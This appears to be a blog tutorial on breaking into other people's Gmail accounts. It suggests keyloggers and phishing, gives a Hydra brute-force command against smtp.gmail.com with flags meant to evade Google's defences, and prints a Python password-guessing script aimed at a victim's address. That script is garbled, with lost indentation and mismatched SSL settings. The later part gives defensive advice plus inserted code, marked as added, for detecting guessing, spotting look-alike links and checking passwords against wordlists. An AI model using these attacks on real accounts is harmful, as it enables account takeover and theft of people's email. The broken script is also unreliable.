
Hacking GMail Accounts


A question that is often asked is how to hack a Gmail account, or how to crack a Gmail password. If you search Google for this information you will find numerous websites that claim to have software that can do just this. They then charge you $100+ with a disclaimer that says there is no guarantee it will work. Very true, and most of the time they know there is about a 100% chance that their software won't deliver, because they developed it to scam you.

This isn't to say hacking a Gmail account isn't possible. But it is to say it isn't quite as easy as these sites make it seem. Trust me, Google would be out of business if it were easy. Below I will talk about some ways of hacking a Gmail account; I will then talk about how to secure your account to prevent such attacks from happening.

Disclaimer: The following information is for educational purposes only. I’m not responsible if you choose to use the methods mentioned for malicious purposes.

Keyloggers

One of the most common ways is to use a keylogger. Trick your victim into downloading a file that will result in everything they type on their computer to be recorded and sent to you. This includes passwords.




Phishing

Set up a phishing site that appears to be Google, and have them attempt to log in to the site. Once they type their username and password, you get the username and password, allowing you to access their Gmail account.




Bruteforce

Bruteforce the password. Many people use human-readable passwords, such as a word or a name and maybe some numbers and special characters. Because of this, huge wordlists have been created for password cracking. There are many tools you can use these wordlists with. Below are two examples.

Hydra

Hydra allows you to provide a list of user names and a password list to use for hacking. Hydra can be used for pretty much any website. A basic example of using hydra to crack a password is as follows.

hydra -S -l <email> -P <filepath/yourlist.txt> -e s -V -s 465 smtp.gmail.com smtp

If you can't understand the above command, it is pretty basic. You're executing hydra and telling it to use SSL; this is the -S in the command. You're telling hydra the login name using -l; obviously we type the email address of the victim and not <email>. Then we tell hydra the wordlist we wish to use with -P; <filepath/yourlist.txt> is changed to the location of your wordlist. We also want hydra to try the login as the password, which is done using -e s. We want hydra to show all attempts it has made using -V, and we want it to do this on port 465, which is done with -s. The server this is done on is smtp.gmail.com.




Hydra does have many limitations. One of them is the size of the wordlist you are allowed to use. Because of this you may want to split the wordlist up and run hydra many times. The above method can be applied to any web-based login system.

Hydra pretty much uses POST methods to send information to the server. The response from the server is usually human readable, not machine readable. Because of this, if you were doing what hydra does you may get something like Bad Request every time it used the wrong password. Google and other sites recognize such activity by hydra and similar software, and they have implemented methods to throw these programs off. For example, Google might change Bad Request to Very Bad Request; Hydra is looking for Bad Request, and anything other than Bad Request will show up as a correct request, meaning Hydra will give many false positives. One way to prevent this is to change the number of tasks to 20 by using -t 20 in the command and then changing the timeout to 50 by using -w 50 in your command.




Understanding how Hydra works means any hacker with malicious intentions can create a script that doesn't have the wordlist limitations hydra has. Below is a Python script that I have been able to use a 15GB wordlist on.


import smtplib
import time
smtpserver = smtplib.SMTP("smtp.gmail.com", 465)
smtpserver.ehlo()
smtpserver.starttls()
user = raw_input("Enter the target's email address: ")
passwfile = raw_input("Enter the password file name: ")
passwfile = open(passwfile, "r")
for password in passwfile:
time.sleep(20)
try:
smtpserver.login(user, password)
print "[+] Password Found: %s" % password
break;
except smtplib.SMTPAuthenticationError:
print "[!] Password Incorrect: %s" % password

Of course you can change time.sleep(20) to sleep longer than 20 seconds or less than 20 seconds. But let's keep in mind that with 20 seconds, on my computer it takes 62 days with the program running nonstop to achieve this goal. However, without a decent timeout the program will halt due to anti-hacking systems set up by Google and many other sites.
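From the defender's side, the anti-hacking systems mentioned above can still see paced guessing when failed logins are counted per account over a long window. The following is an added example, not code from the original post; the log format, account names, IP addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def parse(line):
    """Parse '<ISO time> <ok|fail> <account> <source ip>' (constructed format)."""
    ts, result, account, ip = line.split()
    return datetime.fromisoformat(ts), result, account, ip

def flag_guessing(lines, window, threshold):
    """Return {account: peak failed logins inside any window} for accounts that
    reach the threshold. Lines must be in time order."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, result, account, _ip in map(parse, lines):
        if result != "fail":
            continue
        q = recent[account]
        q.append(ts)
        while ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[account] = max(flagged.get(account, 0), len(q))
    return flagged

def sample_log():
    """Constructed log: one account guessed every 20 s, one user with two typos."""
    start = datetime(2024, 5, 1, 9, 0, 0)
    lines = [f"{(start + timedelta(seconds=20 * i)).isoformat()} fail "
             "victim@example.com 203.0.113.7" for i in range(200)]
    lines += ["2024-05-01T09:05:05 fail bob@example.com 198.51.100.4",
              "2024-05-01T09:05:15 fail bob@example.com 198.51.100.4",
              "2024-05-01T09:05:30 ok bob@example.com 198.51.100.4"]
    return sorted(lines)

if __name__ == "__main__":
    log = sample_log()
    # A short per-minute rule sees only a handful of failures at a time...
    print(flag_guessing(log, timedelta(minutes=1), 5))
    # ...while an hourly per-account count makes the same activity obvious.
    print(flag_guessing(log, timedelta(hours=1), 50))
```

The user who mistyped a password twice is not flagged under either rule, which is the property a lockout or alerting threshold needs.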

Preventing Attacks

Your E-Mail is the most important account you have on the internet. If someone gains access to it, they can go to whatever other sites you are registered with, request a password reset, and gain access to those accounts as well. Because of this it is vital to make sure you take the proper precautions to protect your E-Mail.




Never click on a link you're not 100% certain about. Pay close attention to the address in the address bar. If a link looks like goog1e.com and it is supposed to be google.com, chances are it is a fake Google site designed to phish for your information. Also make sure that you're logging into a secure service. Most well-known websites will use the SSL protocol to log you in, so look at the URL and make sure it has HTTPS in front of it. HTTPS only shows that the connection is encrypted, so still check the domain name itself.

Make sure your system is clean of any malicious software and isn't sending data to locations you're unfamiliar with. If it is, you may have a hooked keyboard that is recording your keystrokes. Running routine scans is always best practice for Windows, Mac and Linux users.
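The address-bar check described above can be automated for links you receive. This is an added example, not part of the original post; the trusted-domain set and the substitution table are assumptions, and it covers ASCII look-alikes only, not Unicode homoglyphs.

```python
from urllib.parse import urlsplit

# Assumption: the domains you actually intend to log in to.
TRUSTED = {"google.com"}

# Common ASCII substitutions: a digit standing in for a similar-looking letter.
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "7": "t"})

def skeleton(host):
    """Fold look-alike characters so goog1e.com and google.com compare equal."""
    return host.lower().translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")

def is_under(host, domain):
    """True if host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)

def classify(url):
    """Return 'trusted', 'insecure', 'lookalike' or 'unknown' for a link."""
    parts = urlsplit(url.strip())
    # .hostname ignores any user@ prefix, so https://google.com@other.example/
    # is judged by its real host, other.example.
    host = (parts.hostname or "").rstrip(".").lower()
    if any(is_under(host, d) for d in TRUSTED):
        return "trusted" if parts.scheme == "https" else "insecure"
    folded = skeleton(host)
    for d in TRUSTED:
        target = skeleton(d)
        # goog1e.com style, or the trusted name used as a prefix of another
        # domain (google.com.account-check.example).
        if is_under(folded, target) or folded.startswith(target + "."):
            return "lookalike"
    return "unknown"

if __name__ == "__main__":
    for link in ("https://accounts.google.com/signin",
                 "http://mail.google.com/",
                 "https://goog1e.com/login",
                 "https://google.com.account-check.example/",
                 "https://example.org/"):
        print(f"{classify(link):10} {link}")
```

Only "trusted" means both the domain and the scheme passed; "unknown" is not a verdict of safety.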




Download several wordlists online and search them for the passwords you use. If your password appears in a wordlist, then don't use the password anymore. Also use passwords that are more than 30 characters long, have special characters, and also use alt keycodes.

Gmail offers Two Factor Authentication. If you have a cellphone it is advisable to set it up. It can be annoying but it is safe. Two factor authentication means even if the attacker has your password, they need physical access to your cellphone in order to log in using your password.
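One way to run the wordlist search described above on your own machine, as an added example that is not part of the original post. It goes slightly beyond an exact match by also reporting when a list contains the base word left after trailing digits and symbols are removed; the file names and sample passwords are constructed.

```python
import getpass
import os
import re
import sys
import tempfile

def base_word(pw):
    """Lower-case and drop trailing digits/symbols: b'Summer2019!' -> b'summer'."""
    return re.sub(rb"[^a-z]+$", b"", pw.lower())

def check_wordlists(passwords, paths):
    """Return {password index: 'exact' or 'base'} for passwords found in any list.

    Lists are streamed in binary mode, so multi-gigabyte files and files with
    mixed encodings are handled without loading them into memory.
    """
    exact = {p.encode(): i for i, p in enumerate(passwords)}
    bases = {base_word(p.encode()): i for i, p in enumerate(passwords)}
    bases.pop(b"", None)  # a password with no letters has no base word
    hits = {}
    for path in paths:
        with open(path, "rb") as fh:
            for line in fh:
                word = line.rstrip(b"\r\n")
                if word in exact:
                    hits[exact[word]] = "exact"
                elif word.lower() in bases:
                    hits.setdefault(bases[word.lower()], "base")
    return hits

def demo():
    """Run the check against a small constructed wordlist."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as fh:
        fh.write(b"password\nsummer\r\nletmein\n")
    try:
        return check_wordlists(["letmein", "Summer2019!", "x9$Qv-unlisted-Zz"], [path])
    finally:
        os.remove(path)

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: script.py list1.txt list2.txt ...
        pw = getpass.getpass("Password to check (not echoed): ")
        found = check_wordlists([pw], sys.argv[1:])
        print("found in a wordlist:", found.get(0, "no"))
    else:
        print(demo())
```

The password is read without echo and is never printed or written to disk; results are reported by index only.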